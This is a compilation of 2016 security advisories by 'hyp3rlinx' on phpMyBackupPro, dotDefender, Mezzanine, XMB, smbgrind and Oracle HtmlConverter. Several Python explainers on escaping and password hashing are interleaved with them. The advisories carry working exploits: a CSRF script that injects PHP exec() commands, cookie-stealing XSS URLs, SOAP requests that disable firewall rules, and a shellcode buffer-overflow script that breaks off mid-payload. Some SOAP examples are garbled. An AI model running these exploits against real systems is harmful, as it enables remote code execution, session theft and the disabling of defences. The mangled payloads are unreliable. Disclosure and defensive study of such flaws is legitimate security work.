February 29, 2016  : Public Disclosure.



Severity Level:

High



Description:


vulnerable DLL: "api-ms-win-appmodel-runtime-l1-1-0.dll"
Vulnerable Product:  Microsoft PowerPoint Viewer 'POWERPNT.EXE'



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


Re: Symantec EP DOS

2016-02-28 Thread hyp3rlinx
*** Be aware "Gerado Sanchez" is re-posting and stealing vulnerability reports 
work/credits as his own, he is also using similar nicknames, emails etc. 

ORIGINAL Symantec EP DOS POST from "hyp3rlinx" is found here dated Jul 08 2015.
http://www.securityfocus.com/archive/1/535958


CyberCop Scanner Smbgrind v5.5 Buffer Overflow

2016-02-16 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/SMBGRIND-BUFFER-OVERFLOW.txt



Vendor:
===
Network Associates Inc.



Product:
===
smbgrind: NetBIOS parallel password grinder
circa 1996-1999

smbgrind.exe is a component of CyberCop Scanner v5.5. It is intended to 
remotely crack SMB
usernames and passwords, used to establish a login session to the remote 
NetBIOS file server.
Cybercop was discontinued back in 2002.

usage: smbgrind -i  [options]

-r  Remote NetBIOS name of destination host
-i  IP address of destination host
-u  Name of userlist file (default NTuserlist.txt)
-p  Name of password list file (default NTpasslist.txt)
-l  Number of simultaneous connections (max: 50 default: 10)
-v  Provide verbose output on progress



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A



Vulnerability Details:
==

Smbgrind.exe succumbs to a buffer overflow when supplied a large number of bytes 
(1206) for the -r switch, the remote NetBIOS name of the destination host, resulting 
in memory corruption that overwrites several registers...

GDB dump...

Program received signal SIGSEGV, Segmentation fault.
0x0040c421 in ?? ()
(gdb) info r
eax            0x3                 3
ecx            0x41414141          1094795585
edx            0x41414141          1094795585
ebx            0x41414141          1094795585
esp            0x241e89c           0x241e89c
ebp            0x241e8a8           0x241e8a8
esi            0x401408            4199432
edi            0x41414141          1094795585
eip            0x40c421            0x40c421
eflags         0x10283             [ CF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x53                83
gs             0x2b                43
(gdb)


smbgrind core dump file...

(C:\smbgrind.exe 1000) exception C005 at 40C421

(C:\smbgrind.exe 1000) exception: ax 2 bx 41414141 cx 41414141 dx 41414141

(C:\smbgrind.exe 1000) exception: si 401408 di 41414141 bp 241F39C sp 241F390

(C:\smbgrind.exe 1000) exception is: STATUS_ACCESS_VIOLATION



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

hyp3rlinx


phpMyBackupPro v.2.5 Remote Command Execution / CSRF

2016-02-16 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-RCE.txt



Vendor:
=
www.phpmybackuppro.net

project site:
sourceforge.net/projects/phpmybackup/



Product:
===
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup 
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or email 
them and a lot more.



Vulnerability Type:
=
Remote Command Execution / CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=

phpMyBackupPro uses PHP configuration files (global_conf.php) to manage 
settings, allowing the user to change things like the SQL host, language, email etc.
However, a malicious local user can also inject persistent arbitrary PHP/OS 
commands into the configuration, to be executed on the host system.
The remote command execution can also result from a CSRF drive-by, if a 
currently logged-in admin visits an attacker's web page.

Attackers can inject arbitrary PHP code into the global_conf.php configuration 
file and have it written to disk if a victim visits a malicious web page or clicks an
infected link (CSRF vector), or, additionally, from a local malicious user in a 
shared-host type environment. 

First we escape the single quotes etc. so we can close the expected entry, 
then we leverage the backtick "`" operator to have PHP execute OS commands
on the victim's system, as it works just as well without having to deal with all the 
quote escaping.

e.g. a payload that handles the single quote "'" and forward slashes "/"...

''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';


The above when injected will result in a write to $CONF variables in 
global_conf.php as follows...

$CONF['lang']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');

OR...

$CONF['email']=ue('\'\'///\\');exec(`c:/Windows/system32/calc.exe`); ///\';');
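The $CONF lines above are PHP source generated from user input, so the escaping of the string literal decides whether a value can turn into code. The Python below is an added example, not phpMyBackupPro's code: it reconstructs a writer consistent with the value the advisory shows (assumed: stripslashes() followed by escaping only the single quote), parses the generated line with PHP's single-quote rules to show exactly what lands outside the string, and contrasts a serializer that escapes backslashes as well and so cannot be broken out of.

```python
# The payload quoted in the advisory above, as a Python raw-string literal.
ADVISORY_PAYLOAD = r"''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';"


def php_stripslashes(value: str) -> str:
    """Port of PHP stripslashes(): drops one level of backslash escaping."""
    out, i = [], 0
    while i < len(value):
        if value[i] == "\\" and i + 1 < len(value):
            out.append(value[i + 1])
            i += 2
        elif value[i] == "\\":
            i += 1  # trailing lone backslash is dropped
        else:
            out.append(value[i])
            i += 1
    return "".join(out)


def flawed_literal(value: str) -> str:
    """Assumed reconstruction of the vulnerable writer: stripslashes() the input
    (a magic_quotes-era habit), then escape only the single quote. This yields
    exactly the $CONF value printed in the advisory."""
    return "'" + php_stripslashes(value).replace("'", "\\'") + "'"


def safe_literal(value: str) -> str:
    """Correct PHP single-quoted literal: escape the backslash first, then the quote,
    so the decoder below always ends the string where the writer intended."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_conf_line(key: str, value: str, literal_fn) -> str:
    """Emit one line of global_conf.php the way a config writer would."""
    return "$CONF['%s']=ue(%s);" % (key, literal_fn(value))


def parse_php_single_quoted(src: str):
    """Parse a PHP single-quoted literal at the start of src by PHP's own rules:
    only \\' and \\\\ are escapes, every other backslash is literal.
    Returns (decoded_value, source_text_after_the_closing_quote)."""
    if not src.startswith("'"):
        raise ValueError("not a single-quoted literal")
    out, i = [], 1
    while i < len(src):
        ch = src[i]
        if ch == "\\" and i + 1 < len(src) and src[i + 1] in "\\'":
            out.append(src[i + 1])
            i += 2
        elif ch == "'":
            return "".join(out), src[i + 1:]
        else:
            out.append(ch)
            i += 1
    raise ValueError("unterminated literal")


def stored_value(conf_line: str) -> str:
    """The string PHP would actually assign from the generated line."""
    start = conf_line.index("ue(") + 3
    value, _ = parse_php_single_quoted(conf_line[start:])
    return value


def code_after_literal(conf_line: str) -> str:
    """Source text PHP sees after the literal. A correct writer always leaves
    exactly ');'. Anything else is attacker-controlled code, i.e. injection."""
    start = conf_line.index("ue(") + 3
    _, rest = parse_php_single_quoted(conf_line[start:])
    return rest


if __name__ == "__main__":
    bad = render_conf_line("lang", ADVISORY_PAYLOAD, flawed_literal)
    good = render_conf_line("lang", ADVISORY_PAYLOAD, safe_literal)
    print(bad)
    print("runs as code:", code_after_literal(bad))
    print(good)
    print("after literal:", repr(code_after_literal(good)))
```

With the flawed writer the literal closes at the attacker's `\\'`, so `);exec(...)` runs and the trailing `///` comments out the writer's own `');`; with the correct serializer the whole payload is stored as data and only `);` follows the literal.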



Exploit code(s):
===

Send the admin an infected link or convince them to visit our malicious web page; then, 
if the user is logged in and...
a) clicks our link or visits our evil web page, or
b) submits the form locally (malicious user), then BOOOM!


Exploit to run calc.exe on Windows 


var c=0;
(function RCE_MAYHEM(){
c++
var xhr=new XMLHttpRequest()
xhr.open('POST','http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php',true)
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
xhr.send("sitename=localhost&lang=''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';&sql_host=localhost&sql_user=&sql_passwd=&sql_db=&ftp_server=hyp3rlinx.altervista.org&ftp_user=hyp3rlinx&ftp_passwd=&ftp_path=&ftp_pasv=1&ftp_port=666&ftp_del=1&email_use=1&email=&submit=Save+data")
if(c<2){
RCE_MAYHEM()
 } 
})()




Disclosure Timeline:
=
Vendor Notification:  NR
February 16, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

High



Description:
=

Request Method(s):[+]  POST


Vulnerable Product:   [+]  phpMyBackupPro v.2.5 (PMBP)


Vulnerable Parameter(s):  [+]  $CONF



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


phpMyBackupPro v.2.5 Arbitrary File Upload

2016-02-16 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-FILE_UPLOAD_VULN.txt



Vendor:
=
www.phpmybackuppro.net

project site:
sourceforge.net/projects/phpmybackup/



Product:
===
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup 
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or email 
them and a lot more.



Vulnerability Type:

Arbitrary File Upload



CVE Reference:
==
N/A



Vulnerability Details:
=

phpMyBackupPro allows SQL uploads but fails to check the actual file type, 
allowing arbitrary file uploads, which
can lead to arbitrary OS command execution, backdoor shells etc...



Exploit code(s):
===

Arbitrary File Upload: under "database queries" the user has the option to 'Upload sql 
file':

1) upload a malicious PHP file containing PHP code as an SQL 
import, selecting "fragmented".
2) click 'Yes' when prompted 'Do you really want to import this backup?' 
3) make an HTTP request to process the uploaded PHP file, e.g. 
http://localhost/phpMyBackupPro-2.5/export/EVIL.php and BOOM!

The 'export' directory comes unprotected, with no .htaccess file etc., and most 
importantly the uploaded file type is not checked.



Disclosure Timeline:
=
Vendor Notification:  NR
February 16, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:

High



Description:
=

Request Method(s):[+]  POST


Vulnerable Product:   [+]  phpMyBackupPro v.2.5 (PMBP)




[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


phpMyBackupPro v.2.5 XSS

2016-02-16 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-XSS.txt



Vendor:
=
www.phpmybackuppro.net

project site:
sourceforge.net/projects/phpmybackup/



Product:
===
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup 
application, licensed under the GNU GPL.
You can create scheduled backups, manage and restore them, download or email 
them and a lot more.



Vulnerability Type:

XSS



CVE Reference:
==
N/A



Vulnerability Details:
=

phpMyBackupPro is vulnerable to multiple XSS entry points allowing arbitrary 
client-side code execution within the victim's browser,
undermining the trust between the client and server, if the user clicks an 
infected link or visits a malicious web page.



Exploit code(s):
===


XSS 1)
http://localhost/phpMyBackupPro-2.5/get_file.php?download=true=%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E


XSS 2)
http://localhost/phpMyBackupPro-2.5/db_info.php?table=alert('XSS 
hyp3rlinx')


XSS 3)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=phpdug=%3Cscript%3Ealert%28666%29%3C%2Fscript%3E=0=0=0=0=1


XSS 4)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=alert(666)<%2Fscript>&fn=http%3A%2F%2Fhyp3rlinx.altervista.org%2Fhell.sql&start=0&foffset=0&totalqueries=0&sn=0&delete=1


XSS 5)

<form id="XSS" action="http://localhost/phpMyBackupPro-2.5/sql_query.php" 
method="post">
<input type="hidden" name="db" value="mysql" />
<input type="hidden" name="sql_query" value="<script>alert('XSS hyp3rlinx 
\n\n'+document.cookie)" />
document.getElementById('XSS').submit()




Disclosure Timeline:
=
Vendor Notification:  NR
February 16, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

High



Description:
=

Request Method(s):[+]  GET / POST


Vulnerable Product:   [+]  phpMyBackupPro v.2.5 (PMBP)




[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


dotDefender Firewall CSRF

2016-02-09 Thread hyp3rlinx
[+] Credits: hyp3rlinx
 
[+] Website: hyp3rlinx.altervista.org
 
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt
 
 
Vendor:
==
www.applicure.com
 
 
Product:
=
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282
 
 
dotDefender is a Web application firewall (WAF) for preventing hacking
attacks like XSS, SQL Injections, CSRF etc...
that provides Apache and IIS Server Security across Dedicated, VPS and
Cloud environments. It meets PCI Compliance and also
provides E-Commerce Security, IIS and Apache Security, Cloud Security and
more.
 
 
Vulnerability Type:
=
Cross Site Request Forgery - CSRF
 
 
CVE Reference:
==
N/A
 
 
Vulnerability Details:
=
dotDefender firewall (WAF) is vulnerable to cross-site request forgery.
This allows attackers to make HTTP requests via the victim's browser to
the dotDefender management server on behalf of the victim if the victim is
logged in and visits a malicious web page or clicks an infected link.
The result can be modifying or disabling various firewall patterns,
User-Defined Rule settings, global event logging, etc.
 
 
HTTP requests sent to Dotdefender to enable or disable user-Defined rule
settings are base64 encoded using SOAP protocol.
Sending the below base64 value, for example, disables a dotDefender firewall
setting:
 
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+

which decodes to <enabled>false</enabled>.
 
 
Tested successfully on Windows & Linux:
 
dotDefender Version:  5.00.12865
Web Server Type:  Microsoft-IIS
Server Operating System:  Windows
Web Server Version:   7.5
Firefox web browser
 
 
dotDefender Version: 5.13-13282
Web Server Type: Apache
Server Operating System: Linux
 
 
Exploit code(s):
===
 
Example of sending requests to disable the firewall rule settings that defend
against SQL injection.
We need to send two requests: the first to modify the desired settings and
the second to commit our changes.
 
 
HTTP request 0x01 - send following soap request to disable SQL Injection
request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
 

 
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain"
 method="post" onsubmit="TORMENT()">

document.getElementById('SACRIFICIAL').submit()

 
 
HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
 
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain"
 method="post">

function
TORMENT(){document.getElementById('VICTIM').submit()}

 
 
 
Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
 
This disables rule #19; send the below request to disable remote IP
protections:
 
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="
http://www.zolera.com/schemas/ZSI/;
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="
http://schemas.xmlsoap.org/soap/encoding/;
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>
http://applicure.com/dotDefender;>0
/ud_rules/request_rules/request_rule[rule_id=19]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
 
 
disable rule 20:
~=~=~=~=~=~=~=~=
 
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;>
0/ud_rules/request_rules/request_rule[rule_id=20]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
 
 
Finally, commit them with the below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
 
http://www.w3.org/2001/XMLSchema-instance;
xmlns:xsd="http://www.w3.org/2001/XMLSchema;
xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="
http://schemas.xmlsoap.org/soap/envelope/;
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="
http://schemas.xmlsoap.org/soap/envelope/;
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>http://applicure.com/dotDefender;>
0
 
 
 
 
Disclosure Timeline:

Vendor Notifications:
 
initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure
 
 
Exploitation Technique:
===
Remote
 
 
Severity Level:
==
High
 
 
Descr

Mezzanine CMS 4.1.0 XSS

2016-02-03 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/MEZZANINE-CMS-XSS.txt



Vendor:
===
mezzanine.jupo.org



Product:

Mezzanine 4.1.0

Mezzanine is an open source CMS built using the python based Django framework.



Vulnerability Type:
===
XSS



CVE Reference:
==
N/A



Vulnerability Details:
=

XSS entry points exist within the filebrowser_safe package. 

In many areas throughout filebrowser, querystring parameters are passed 
directly into templates to form URLs for links and forms,
and these were not being escaped correctly, therefore allowing arbitrary 
JavaScript code to be injected.

In order to exploit this, an attacker would need to trick an authenticated 
administrator into clicking a malicious link
or viewing a malicious web page containing the XSS payload.

Resolution:
Upgrade right away (pip install -U filebrowser_safe).

If for some reason you're unable to upgrade seamlessly, here is the fix which 
you need to apply:
https://github.com/stephenmcd/filebrowser-safe/commit/14b30017d27ca6a952e1578ed8cecbb102979967



Exploit code(s):
===

XSS 1)

http://localhost:8000/admin/media-library/rename/?ot=desc=date=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


XSS 2)

http://localhost:8000/admin/media-library/rename/?ot=desc=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=


XSS 3)

http://localhost:8000/admin/media-library/rename/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E==


XSS 4) 

http://localhost:8000/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=gallery=date


XSS 5) 

http://localhost:8000/admin/media-library/upload/?ot=desc=gallery=%3C%2Fscript%3E%3Cscript%3Ealert%28666%29%3C%2Fscript%3E


XSS 6) 

http://localhost:8000/admin/media-library/upload/?ot=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS\n\nhyp3rlinx%27%29%3C%2Fscript%3E=gallery=date


XSS 7)

http://localhost:8000/admin/media-library/upload//static/filebrowser/uploadify/?=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



Disclosure Timeline:
=
Vendor Notification: January 26, 2016
February 2, 2016  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

High



Description:
===
Request Method(s):[+]  GET


Vulnerable Product:   [+]  Mezzanine 4.1.0

===

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx
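The bug class in the Mezzanine/filebrowser_safe advisory above (querystring values copied into a template to build links) is the same one behind the phpMyBackupPro, AEF, FortiSandbox and Webgrind XSS advisories on this page. Added example, not code from any of those advisories or projects: the vulnerable rendering pattern beside the fixed form, run on the advisory's own payload; the parameter names ot/o/q come from the advisory URLs, the route and payload string are constructed for the demo.

```python
"""Added example, not code from the advisory or from Mezzanine/filebrowser_safe:
the vulnerable link-building pattern beside the fixed one. Parameter names
ot/o/q come from the advisory URLs; the payload and route are constructed."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed: the reflected payload shape from the advisory (XSS 4), decoded.
XSS_PAYLOAD = '"/><script>alert(document.cookie)</script>'

def query_params(url):
    """Parse the query string into single values, percent-decoding as the
    framework would. URL-encoding in the request is no protection: the
    value arrives decoded."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}

def render_link_unsafe(base_path, params):
    """Vulnerable pattern: raw parameter values concatenated into an href
    attribute, so a value starting with '"/><script>' closes the tag."""
    query = "&".join("%s=%s" % (k, v) for k, v in params.items())
    return '<a href="%s?%s">sort</a>' % (base_path, query)

def render_link_safe(base_path, params):
    """Fixed pattern: percent-encode the query string, then HTML-escape the
    whole attribute value for the context it is inserted into."""
    href = "%s?%s" % (base_path, urlencode(params))
    return '<a href="%s">sort</a>' % html.escape(href, quote=True)

def tag_survives(rendered):
    """Demo check: did attacker markup reach the HTML unencoded?"""
    return "<script" in rendered or '"/>' in rendered

if __name__ == "__main__":
    url = ("/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28"
           "document.cookie%29%3C/script%3E&o=gallery&q=date")
    params = query_params(url)
    print(render_link_unsafe("/admin/media-library/browse/", params))
    print(render_link_safe("/admin/media-library/browse/", params))
```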


XMB - eXtreme Message Board v1.9.11.13 Weak Crypto

2016-01-25 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/XMB-WEAK-CRYPTO.txt



Vendor:
==
xmbforum2.com


Product:
==
XMB - eXtreme Message Board v1.9.11.13
XMB forum software is open source and runs PHP scripts with a MySQL database 
backend.


Vulnerability Type:
===
Weak Crypto / Insecure Password Storage



Vulnerability Details:
=

1) Weak Crypto

XMB Forum uses the weak MD5 hashing algorithm with no salt; the unsalted 
password hashes are then stored in a browser cookie and also in the 'xmb_members'
table of the XMB database. Using weak cryptographic one-way hash functions like 
MD5 without a salt for storing user passwords allows attackers
that gain access to this data to conduct password cracking attacks 
using pre-computed dictionaries, e.g. rainbow tables.

2) Insecure Storage

Storing user passwords in unsalted MD5 hash form leaves them vulnerable both 
online and offline. I noticed XMB has no session timeout/logout mechanism
for when a user is inactive for a certain period of time and does not log out, 
leaving their unsalted MD5 passwords stored in cookies on disk. This further
allows their passwords to be vulnerable to theft if their local machine is 
compromised. However, even if the user logs out and XMB cookies are cleared,
the passwords are still in the MySQL database on the server, unsalted and MD5 
hashed.


POC:
=

Example XMB cookie ...

MD5 password of 'abc123' > 'e99a18c428cb38d5f260853678922e03' 

"xmblva=1453182891; xmblvb=1453178920; xmbuser=admin; 
xmbpw=e99a18c428cb38d5f260853678922e03; xmblva=1453091894;


On disc ---> %APPDATA%\Roaming\Mozilla\Firefox\Profiles in the 'cookies.sqlite' 
database file used by Firefox.

e.g. 

localhostxmbpwe99a18c428cb38d5f260853678922e03localhost/XMB-1.9.11.13/files

In "member.php" on line 493 under the files/ dir of the XMB application we see 
the user password being hashed with the weak MD5 function, then stored
in the MySQL database.

$password = md5($password);


  
if ($SETTINGS['regoptional'] == 'off') {

$db->query("INSERT INTO ".X_PREFIX."members (username, password, regdate, 
postnum, email, 

etc

In 'member.php' on line 599 we see it stored in a cookie ---> put_cookie("xmbpw", 
$password, $currtime, $cookiepath, $cookiedomain);


Disclosure Date:

Vendor Notification:  NA
January 23, 2016 : Public Disclosure



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx
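Added example for the XMB advisory above, not XMB's code: it reproduces the unsalted md5('abc123') value quoted in the advisory, shows why a salt-less hash falls to one precomputed table, and gives a salted PBKDF2 replacement with a login-time migration of legacy rows. The wordlist, salts and iteration count are constructed or assumed for the demo.

```python
"""Added example, not XMB's code: why the unsalted MD5 described above is
weak, plus a salted, iterated replacement with a migration check for legacy
rows. The hash value is the one quoted in the advisory; wordlist, salts and
iteration count are constructed/assumed for the demo."""
import hashlib
import hmac
import os
import re
import secrets

ADVISORY_HASH = "e99a18c428cb38d5f260853678922e03"   # md5('abc123'), from the advisory
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 600_000   # assumption: current OWASP-level cost for PBKDF2-SHA256

def legacy_md5(password):
    """What member.php does: md5($password) with no salt, so the same
    password yields the same hash for every user on every site."""
    return hashlib.md5(password.encode()).hexdigest()

def precomputed_lookup(stored_hash, candidates):
    """Salt-less hashes fall to one table built once: md5(candidate) -> candidate.
    Returns the recovered password or None."""
    table = {legacy_md5(c): c for c in candidates}
    return table.get(stored_hash)

def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; record format pbkdf2$<iters>$<salt hex>$<hash hex>."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), dk.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and cost, compare in constant time."""
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
        salt, iters = bytes.fromhex(salt_hex), int(iters)
    except ValueError:
        return False
    if scheme != "pbkdf2":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iters)
    return hmac.compare_digest(dk.hex(), dk_hex)

def needs_rehash(stored):
    """Legacy rows are bare 32-hex MD5; upgrade them at the next successful login."""
    return bool(LEGACY_MD5.match(stored))

def login(stored, password):
    """Returns (ok, replacement_record_or_None). A legacy row that verifies is
    replaced by a salted record derived from the password the user just typed,
    never from the old hash alone."""
    if needs_rehash(stored):
        if hmac.compare_digest(legacy_md5(password), stored):
            return True, hash_password(password)
        return False, None
    return verify_password(password, stored), None

def new_session_token():
    """What the xmbpw cookie should hold instead of a password hash: a random
    value naming a server-side session, which reveals nothing if stolen."""
    return secrets.token_urlsafe(32)
```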


Oracle HtmlConverter.exe Buffer Overflow

2016-01-20 Thread hyp3rlinx
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt



Vendor:
===
www.oracle.com



Product:

Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50


The HTML Converter is a binary that ships with the Java SE JDK and allows web 
page authors to explicitly target
the browsers and platforms used in their environment when modifying their pages.



Vulnerability Type:

Buffer Overflow




CVE Reference:
==
N/A




Vulnerability Details:
=

When calling HtmlConverter.exe with a specially crafted payload it will cause a 
buffer overflow, executing arbitrary attacker-supplied code.
This was a small vulnerability included as part of the overall Oracle CPU 
released on January 19, 2016.

Reference:
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html



registers ...

EAX FFFE
ECX FFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 1DB1
EDI 
EIP 52525252  < "" \x52
C 0  ES 002B 32bit 0()
P 0  CS 0023 32bit 0()
A 1  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0



Exploit code(s):
===

# Python 2 script (str and struct.pack output concatenate directly).
import struct
import subprocess

###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "#EIP @ 2493
pgm="C:\\Program Files (x86)\\Java\\jdk160_24\\bin\\HtmlConverter.exe " #EIP 2469 - 2479

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
